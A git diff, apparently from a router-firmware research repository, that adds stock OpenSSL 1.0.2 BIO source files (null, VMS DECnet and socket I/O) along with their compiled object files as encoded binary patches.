zI%L+X6DwPKP@Ctv^M2^J9_W>#b3s{(oyB;Kt^R2iF*G?5J9F2C_cO>YCu8&3&DnO&
zx**SSrXz#-I_rm_8v$90`k!Rc$ZYz!#rh0QgXC|`_0*{aHvGlGH59A3-YNi|ymAKs
zzsnC>Q(*0!i#l6RV7T_E|2E_(Y`q}=JS5~pe5`C;fW<jK$2nUQU?>5$`<$})J_-f&
zW5R|+Ve1093<>$Yd}zC{5#%vQK7zZ?kpWSFJV4r9wY6fvrN2f|A7|r}5+GtV*S7`8
zj`e`o0%Y4KcpeCzH?N!muo0i$gg>_l|KTS5XPfYsH{lmH;lBlb7tC}wpMNnUf8adL
zIospF{=A7FGE%7&;8Kj22z(2Z>NLwWwRnOR##Ft+3Zt5;vO-DM##v!n`?l_&sVY~R
zQ1z4L6Qq#M9qN^Hg+u-QgPEbikldTg6i9Erzi=>fkoD2494eH?)uL7y9WRct9wy4)
zRSEKns&gtVSl^i=M+(qULDjUf)^awcm8Y4fNyiq)!b&g_EEnLW7j>8dg0CeMJbCy;
z_$NN(K)!(x1o=IX1V4`u1o^#?1iyq31UcS+f-fTk@%owL=MDL1APN0zoa6DrT`Kr*
z_<2M9`&|5ni@W3ei;M4c>3@yy18l|zs_?IJ?)7hOqCfA_f57DjicHWyrY){GutD$)
z=i+7%{3z#Q{|Y|Oxj2i0|A=$(dnoveoa0)c2>w&f#c!nGb<U$qdrki*oOgNn&pF56
zGZf)xg!6|S+~T90i}B(zyZ-cO-7&~fRot&4e!<0k9|av0!Nt8R;t^c@4kR4)mi{?Z
z0O@wJ7Uxxx@^JCH5#=0X<U?X)zlV!B#eF06MLg#{`oh2M;Udo49xmo5#>XN2i+R}Z
z;o@E#@NjW2l6d9JgkBthT-TiZq$p|XcrmW4r*#rPQPhhh4tFGpGpdyx;^b(Xj3;>;
zwxCvgyj&`dlX$5-F`-U^lgYBK#^F)-a78bcPVxHKWHmmem8VoqKf@iUCkvxmaYE%o
z|DUobSmV&Qdc34~{Q^JFqM1*Vs1m$G@NP)8h*OC1pHeZec&DJP*ym#ZKFGPJ8}gwS
zIBuB_USt`bC-mu6|4;3|1hyELd(T3()xS6&$WU;sZb?FAqw$~SPm(B~FdY9DNZ#=u
z0EQ}$KypircjUecu${YW<wrR4jz7ii2i#7f9QD)>LVct7U*Z?7&Gj*UjNKdm2r!Jv
zJ5SH^{`WweTfFh(J4!IO-mkd5n_=0j`xG#IEqd3_=Jru&bBl;yupdJKeR}Pexc!u;
zL$5u)b5S(~$t_RtC*~hH#Q8%c?8W}ysBbhG;0N+14=e%<f6Kh~_)hVzJs{G}A29D>
X#U-BMz<;zhwomYlhwo6gc<uiU8=2>m

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_null.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_null.c
new file mode 100644
index 0000000..6a03fa2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_null.c
@@ -0,0 +1,149 @@
+/* crypto/bio/bss_null.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#include "cryptlib.h"
+#include <openssl/bio.h>
+
+static int null_write(BIO *h, const char *buf, int num);
+static int null_read(BIO *h, char *buf, int size);
+static int null_puts(BIO *h, const char *str);
+static int null_gets(BIO *h, char *str, int size);
+static long null_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int null_new(BIO *h);
+static int null_free(BIO *data);
+static BIO_METHOD null_method = {
+    BIO_TYPE_NULL,
+    "NULL",
+    null_write,
+    null_read,
+    null_puts,
+    null_gets,
+    null_ctrl,
+    null_new,
+    null_free,
+    NULL,
+};
+
+BIO_METHOD *BIO_s_null(void)
+{
+    return (&null_method);
+}
+
+static int null_new(BIO *bi)
+{
+    bi->init = 1;
+    bi->num = 0;
+    bi->ptr = (NULL);
+    return (1);
+}
+
+static int null_free(BIO *a)
+{
+    if (a == NULL)
+        return (0);
+    return (1);
+}
+
+static int null_read(BIO *b, char *out, int outl)
+{
+    return (0);
+}
+
+static int null_write(BIO *b, const char *in, int inl)
+{
+    return (inl);
+}
+
+static long null_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    long ret = 1;
+
+    switch (cmd) {
+    case BIO_CTRL_RESET:
+    case BIO_CTRL_EOF:
+    case BIO_CTRL_SET:
+    case BIO_CTRL_SET_CLOSE:
+    case BIO_CTRL_FLUSH:
+    case BIO_CTRL_DUP:
+        ret = 1;
+        break;
+    case BIO_CTRL_GET_CLOSE:
+    case BIO_CTRL_INFO:
+    case BIO_CTRL_GET:
+    case BIO_CTRL_PENDING:
+    case BIO_CTRL_WPENDING:
+    default:
+        ret = 0;
+        break;
+    }
+    return (ret);
+}
+
+static int null_gets(BIO *bp, char *buf, int size)
+{
+    return (0);
+}
+
+static int null_puts(BIO *bp, const char *str)
+{
+    if (str == NULL)
+        return (0);
+    return (strlen(str));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_null.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_null.o
new file mode 100644
index 0000000000000000000000000000000000000000..f16c794616a33aad3837236a32b4f798b2e8ed5a
GIT binary patch
literal 2736
zcmb`I-%Aux6vyv6rdH-!R!H_^dI_Z*c1_3%WXWtN5DQ@;C|cKb{6YJR*;&*c%CKKT
zfe!^e_E-?nQ~0>hg9bea{R93B79>Qpoiq2G+1q7$kq(UKdp`G^d$0G`-X9*h(h!LV
zwul%M^@ynuADZeq;md?*7g6y&di>{FvJ*>I@y}Ya8(ZzQWDNZ$Y>!v%N44n7Dh0k<
z-jHr9US0a#I@jSB+g~@|9zG%j<VHWrbbEOl%YS%n_R{CtxA*q)y1l(oTUYzCpYQU=
z8cmIipir%;QH}nCP7V!SFuPL|m4a6>&s%4$Sa1AX#Si26`eIhBzei#@77pJIAI>m2
zni35{RFN6*p&gV?MDC7>$b5UGtF^gh1r`!(j#8UR9+|(Y;P)x)GU;Z8-3VbhVkecn
zMbgI<_JXw9-y34B<p1UH3^a<ZT3EXgda`gWcs2g6GN32jaQp_PACnRe5$BlK=LGRy
z%H#j3hj_onF~<Hc66duVBz}uHua`}HfjIX+2605xFU@soM`!q_K>;KUC0}hd#BMbV
zv?2BcS`~)atA>F#L`$Gq+y-#~X1Yiq*x!kAIbEpaa#mKLOBb9uDW+V<k;-*4lTyvO
zvmU{$=jJ3VRlKrP(+;b=<INN&#igs)(z1J=#}g88KSUdRziQHW#(1uHPcaqm0vd9x
z;eG5x2*#ZE-Slal^FDTKocEFM8TZ5IVL;2LP$V>NQp_Ibh#wozm$^v|c%IOh^Za?f
z%(=cK(}R4T=R=Ki{VR?0|NBnkixdm1ypZ=Y6W~2p`WaTPlgn71Gw%s&GUH{01!qQB
zZV>}ak6UpFG07*OtXwgh$q6f4%;%i~)D?=JW5K)FTlO;9I}}eBDptuYmK@hxpbngw
z^pu;)J3Ol$dlM>gPwO{Rc9oD$JR{Ezb5-kt0AHnq3PC@mr;5)Xo>i>n^UM4cas9>n
z0zAz0@y|dK_PNvgIMiaFeekKq<NLp)N&}D2ei+(N>*H@yjrz_ZGKsTGfCyW^*R+0B
zO2qZUJ<``N1q{dM`w7yw7)|gr1M-CZ8btWsF{2dU-3)^vxdmYO#^XIyZJg>&6@upZ
zGky#LQ}y~qs$b<q@_PLP;9=`GP8(OHI$S^e72tY4e_>-|$pB4gljebMa7Rcz{u1eX
d4@h*<{>@^b7<Ctr{h-3?O}daPL8cUX{U7(Q)}{ae

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_rtcp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_rtcp.c
new file mode 100644
index 0000000..09f14f4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_rtcp.c
@@ -0,0 +1,319 @@
+/* crypto/bio/bss_rtcp.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*-
+ * Written by David L. Jones <jonesd@kcgl1.eng.ohio-state.edu>
+ * Date:   22-JUL-1996
+ * Revised: 25-SEP-1997         Update for 0.8.1, BIO_CTRL_SET -> BIO_C_SET_FD
+ */
+/* VMS */
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <errno.h>
+#include "cryptlib.h"
+#include <openssl/bio.h>
+
+#include <iodef.h>              /* VMS IO$_ definitions */
+#include <starlet.h>
+
+typedef unsigned short io_channel;
+/*************************************************************************/
+struct io_status {
+    short status, count;
+    long flags;
+};
+
+/* Should have member alignment inhibited */
+struct rpc_msg {
+    /* 'A'-app data. 'R'-remote client 'G'-global */
+    char channel;
+    /* 'G'-get, 'P'-put, 'C'-confirm, 'X'-close */
+    char function;
+    /* Amount of data returned or max to return */
+    unsigned short int length;
+    /* variable data */
+    char data[4092];
+};
+#define RPC_HDR_SIZE (sizeof(struct rpc_msg) - 4092)
+
+struct rpc_ctx {
+    int filled, pos;
+    struct rpc_msg msg;
+};
+
+static int rtcp_write(BIO *h, const char *buf, int num);
+static int rtcp_read(BIO *h, char *buf, int size);
+static int rtcp_puts(BIO *h, const char *str);
+static int rtcp_gets(BIO *h, char *str, int size);
+static long rtcp_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int rtcp_new(BIO *h);
+static int rtcp_free(BIO *data);
+
+static BIO_METHOD rtcp_method = {
+    BIO_TYPE_FD,
+    "RTCP",
+    rtcp_write,
+    rtcp_read,
+    rtcp_puts,
+    rtcp_gets,
+    rtcp_ctrl,
+    rtcp_new,
+    rtcp_free,
+    NULL,
+};
+
+BIO_METHOD *BIO_s_rtcp(void)
+{
+    return (&rtcp_method);
+}
+
+/*****************************************************************************/
+/*
+ * Decnet I/O routines.
+ */
+
+#ifdef __DECC
+# pragma message save
+# pragma message disable DOLLARID
+#endif
+
+static int get(io_channel chan, char *buffer, int maxlen, int *length)
+{
+    int status;
+    struct io_status iosb;
+    status = sys$qiow(0, chan, IO$_READVBLK, &iosb, 0, 0,
+                      buffer, maxlen, 0, 0, 0, 0);
+    if ((status & 1) == 1)
+        status = iosb.status;
+    if ((status & 1) == 1)
+        *length = iosb.count;
+    return status;
+}
+
+static int put(io_channel chan, char *buffer, int length)
+{
+    int status;
+    struct io_status iosb;
+    status = sys$qiow(0, chan, IO$_WRITEVBLK, &iosb, 0, 0,
+                      buffer, length, 0, 0, 0, 0);
+    if ((status & 1) == 1)
+        status = iosb.status;
+    return status;
+}
+
+#ifdef __DECC
+# pragma message restore
+#endif
+
+/***************************************************************************/
+
+static int rtcp_new(BIO *bi)
+{
+    struct rpc_ctx *ctx;
+    bi->init = 1;
+    bi->num = 0;
+    bi->flags = 0;
+    bi->ptr = OPENSSL_malloc(sizeof(struct rpc_ctx));
+    ctx = (struct rpc_ctx *)bi->ptr;
+    ctx->filled = 0;
+    ctx->pos = 0;
+    return (1);
+}
+
+static int rtcp_free(BIO *a)
+{
+    if (a == NULL)
+        return (0);
+    if (a->ptr)
+        OPENSSL_free(a->ptr);
+    a->ptr = NULL;
+    return (1);
+}
+
+static int rtcp_read(BIO *b, char *out, int outl)
+{
+    int status, length;
+    struct rpc_ctx *ctx;
+    /*
+     * read data, return existing.
+     */
+    ctx = (struct rpc_ctx *)b->ptr;
+    if (ctx->pos < ctx->filled) {
+        length = ctx->filled - ctx->pos;
+        if (length > outl)
+            length = outl;
+        memmove(out, &ctx->msg.data[ctx->pos], length);
+        ctx->pos += length;
+        return length;
+    }
+    /*
+     * Requst more data from R channel.
+     */
+    ctx->msg.channel = 'R';
+    ctx->msg.function = 'G';
+    ctx->msg.length = sizeof(ctx->msg.data);
+    status = put(b->num, (char *)&ctx->msg, RPC_HDR_SIZE);
+    if ((status & 1) == 0) {
+        return -1;
+    }
+    /*
+     * Read.
+     */
+    ctx->pos = ctx->filled = 0;
+    status = get(b->num, (char *)&ctx->msg, sizeof(ctx->msg), &length);
+    if ((status & 1) == 0)
+        length = -1;
+    if (ctx->msg.channel != 'R' || ctx->msg.function != 'C') {
+        length = -1;
+    }
+    ctx->filled = length - RPC_HDR_SIZE;
+
+    if (ctx->pos < ctx->filled) {
+        length = ctx->filled - ctx->pos;
+        if (length > outl)
+            length = outl;
+        memmove(out, ctx->msg.data, length);
+        ctx->pos += length;
+        return length;
+    }
+
+    return length;
+}
+
+static int rtcp_write(BIO *b, const char *in, int inl)
+{
+    int status, i, segment, length;
+    struct rpc_ctx *ctx;
+    /*
+     * Output data, send in chunks no larger that sizeof(ctx->msg.data).
+     */
+    ctx = (struct rpc_ctx *)b->ptr;
+    for (i = 0; i < inl; i += segment) {
+        segment = inl - i;
+        if (segment > sizeof(ctx->msg.data))
+            segment = sizeof(ctx->msg.data);
+        ctx->msg.channel = 'R';
+        ctx->msg.function = 'P';
+        ctx->msg.length = segment;
+        memmove(ctx->msg.data, &in[i], segment);
+        status = put(b->num, (char *)&ctx->msg, segment + RPC_HDR_SIZE);
+        if ((status & 1) == 0) {
+            i = -1;
+            break;
+        }
+
+        status = get(b->num, (char *)&ctx->msg, sizeof(ctx->msg), &length);
+        if (((status & 1) == 0) || (length < RPC_HDR_SIZE)) {
+            i = -1;
+            break;
+        }
+        if ((ctx->msg.channel != 'R') || (ctx->msg.function != 'C')) {
+            printf("unexpected response when confirming put %c %c\n",
+                   ctx->msg.channel, ctx->msg.function);
+
+        }
+    }
+    return (i);
+}
+
+static long rtcp_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    long ret = 1;
+
+    switch (cmd) {
+    case BIO_CTRL_RESET:
+    case BIO_CTRL_EOF:
+        ret = 1;
+        break;
+    case BIO_C_SET_FD:
+        b->num = num;
+        ret = 1;
+        break;
+    case BIO_CTRL_SET_CLOSE:
+    case BIO_CTRL_FLUSH:
+    case BIO_CTRL_DUP:
+        ret = 1;
+        break;
+    case BIO_CTRL_GET_CLOSE:
+    case BIO_CTRL_INFO:
+    case BIO_CTRL_GET:
+    case BIO_CTRL_PENDING:
+    case BIO_CTRL_WPENDING:
+    default:
+        ret = 0;
+        break;
+    }
+    return (ret);
+}
+
+static int rtcp_gets(BIO *bp, char *buf, int size)
+{
+    return (0);
+}
+
+static int rtcp_puts(BIO *bp, const char *str)
+{
+    int length;
+    if (str == NULL)
+        return (0);
+    length = strlen(str);
+    if (length == 0)
+        return (0);
+    return rtcp_write(bp, str, length);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_sock.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_sock.c
new file mode 100644
index 0000000..6194d2c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_sock.c
@@ -0,0 +1,287 @@
+/* crypto/bio/bss_sock.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#define USE_SOCKETS
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_SOCK
+
+# include <openssl/bio.h>
+
+# ifdef WATT32
+#  define sock_write SockWrite  /* Watt-32 uses same names */
+#  define sock_read  SockRead
+#  define sock_puts  SockPuts
+# endif
+
+static int sock_write(BIO *h, const char *buf, int num);
+static int sock_read(BIO *h, char *buf, int size);
+static int sock_puts(BIO *h, const char *str);
+static long sock_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int sock_new(BIO *h);
+static int sock_free(BIO *data);
+int BIO_sock_should_retry(int s);
+
+static BIO_METHOD methods_sockp = {
+    BIO_TYPE_SOCKET,
+    "socket",
+    sock_write,
+    sock_read,
+    sock_puts,
+    NULL,                       /* sock_gets, */
+    sock_ctrl,
+    sock_new,
+    sock_free,
+    NULL,
+};
+
+BIO_METHOD *BIO_s_socket(void)
+{
+    return (&methods_sockp);
+}
+
+BIO *BIO_new_socket(int fd, int close_flag)
+{
+    BIO *ret;
+
+    ret = BIO_new(BIO_s_socket());
+    if (ret == NULL)
+        return (NULL);
+    BIO_set_fd(ret, fd, close_flag);
+    return (ret);
+}
+
+static int sock_new(BIO *bi)
+{
+    bi->init = 0;
+    bi->num = 0;
+    bi->ptr = NULL;
+    bi->flags = 0;
+    return (1);
+}
+
+static int sock_free(BIO *a)
+{
+    if (a == NULL)
+        return (0);
+    if (a->shutdown) {
+        if (a->init) {
+            SHUTDOWN2(a->num);
+        }
+        a->init = 0;
+        a->flags = 0;
+    }
+    return (1);
+}
+
+static int sock_read(BIO *b, char *out, int outl)
+{
+    int ret = 0;
+
+    if (out != NULL) {
+        clear_socket_error();
+        ret = readsocket(b->num, out, outl);
+        BIO_clear_retry_flags(b);
+        if (ret <= 0) {
+            if (BIO_sock_should_retry(ret))
+                BIO_set_retry_read(b);
+        }
+    }
+    return (ret);
+}
+
+static int sock_write(BIO *b, const char *in, int inl)
+{
+    int ret;
+
+    clear_socket_error();
+    ret = writesocket(b->num, in, inl);
+    BIO_clear_retry_flags(b);
+    if (ret <= 0) {
+        if (BIO_sock_should_retry(ret))
+            BIO_set_retry_write(b);
+    }
+    return (ret);
+}
+
+static long sock_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    long ret = 1;
+    int *ip;
+
+    switch (cmd) {
+    case BIO_C_SET_FD:
+        sock_free(b);
+        b->num = *((int *)ptr);
+        b->shutdown = (int)num;
+        b->init = 1;
+        break;
+    case BIO_C_GET_FD:
+        if (b->init) {
+            ip = (int *)ptr;
+            if (ip != NULL)
+                *ip = b->num;
+            ret = b->num;
+        } else
+            ret = -1;
+        break;
+    case BIO_CTRL_GET_CLOSE:
+        ret = b->shutdown;
+        break;
+    case BIO_CTRL_SET_CLOSE:
+        b->shutdown = (int)num;
+        break;
+    case BIO_CTRL_DUP:
+    case BIO_CTRL_FLUSH:
+        ret = 1;
+        break;
+    default:
+        ret = 0;
+        break;
+    }
+    return (ret);
+}
+
+static int sock_puts(BIO *bp, const char *str)
+{
+    int n, ret;
+
+    n = strlen(str);
+    ret = sock_write(bp, str, n);
+    return (ret);
+}
+
+int BIO_sock_should_retry(int i)
+{
+    int err;
+
+    if ((i == 0) || (i == -1)) {
+        err = get_last_socket_error();
+
+# if defined(OPENSSL_SYS_WINDOWS) && 0/* more microsoft stupidity? perhaps
+                                       * not? Ben 4/1/99 */
+        if ((i == -1) && (err == 0))
+            return (1);
+# endif
+
+        return (BIO_sock_non_fatal_error(err));
+    }
+    return (0);
+}
+
+int BIO_sock_non_fatal_error(int err)
+{
+    switch (err) {
+# if defined(OPENSSL_SYS_WINDOWS) || defined(OPENSSL_SYS_NETWARE)
+#  if defined(WSAEWOULDBLOCK)
+    case WSAEWOULDBLOCK:
+#  endif
+
+#  if 0                         /* This appears to always be an error */
+#   if defined(WSAENOTCONN)
+    case WSAENOTCONN:
+#   endif
+#  endif
+# endif
+
+# ifdef EWOULDBLOCK
+#  ifdef WSAEWOULDBLOCK
+#   if WSAEWOULDBLOCK != EWOULDBLOCK
+    case EWOULDBLOCK:
+#   endif
+#  else
+    case EWOULDBLOCK:
+#  endif
+# endif
+
+# if defined(ENOTCONN)
+    case ENOTCONN:
+# endif
+
+# ifdef EINTR
+    case EINTR:
+# endif
+
+# ifdef EAGAIN
+#  if EWOULDBLOCK != EAGAIN
+    case EAGAIN:
+#  endif
+# endif
+
+# ifdef EPROTO
+    case EPROTO:
+# endif
+
+# ifdef EINPROGRESS
+    case EINPROGRESS:
+# endif
+
+# ifdef EALREADY
+    case EALREADY:
+# endif
+        return (1);
+        /* break; */
+    default:
+        break;
+    }
+    return (0);
+}
+
+#endif                          /* #ifndef OPENSSL_NO_SOCK */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_sock.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bss_sock.o
new file mode 100644
index 0000000000000000000000000000000000000000..40af39e7c964f8fd3b6a8119ec088b797223638e
GIT binary patch
literal 4256
zcmbtWU2Gdg5MJ9Ub^3EL{Q*NmFrq4{Xis)2YJmd2{P{vH5=ep&X>eWV(nNLa=)5K=
zZ87MSic=cY2P$}jN01Ot2o;1POKD|_00o5yqzaJ-9#W+UN+nvLjhWfoO|}<Xpfb{W
zX1|@ko!uQ@p*7y-^>~ON4|$3#&jd=y`|FnFC=;V3K<dcVx`w|>u^=L6(XJG0L|HGz
z!pKXp5VC1hixl<oGJU$sD%2C*{+p>&)hYxD-8@lfobrO=JZeuIYh=9CEctB?;ZpB3
zbES2++u!$effs9WUEwa~%354g=(866^cichmhN9zuiM{Pi-WY*S{$PFk>Wyh{*`jM
zJkd&8>{LDY#&qrG#)SuU>&r4rqd_0PKvzw~8f}lBf)zzi#p)OQc2_-%(A%dSVBz)2
zRhW#EN{?pW)F+=rK<n<Zud>wJ?Q{Bgk#5vevn}?esX<uO?Gjsx+jG6z0j-bM#46_s
zk6Pun!Uks-<r=!pDzB}3yST7rvg0!b>Yrn-0jP#PJExD&)SW5TeOhD=$|bAp8C~1S
zTu<zMY2m|&v!L~~Mt*@3S(gL)_#e7WxB6*^Zr`+LnW{bk0AyFfyvf7~r{Ys}FwyN_
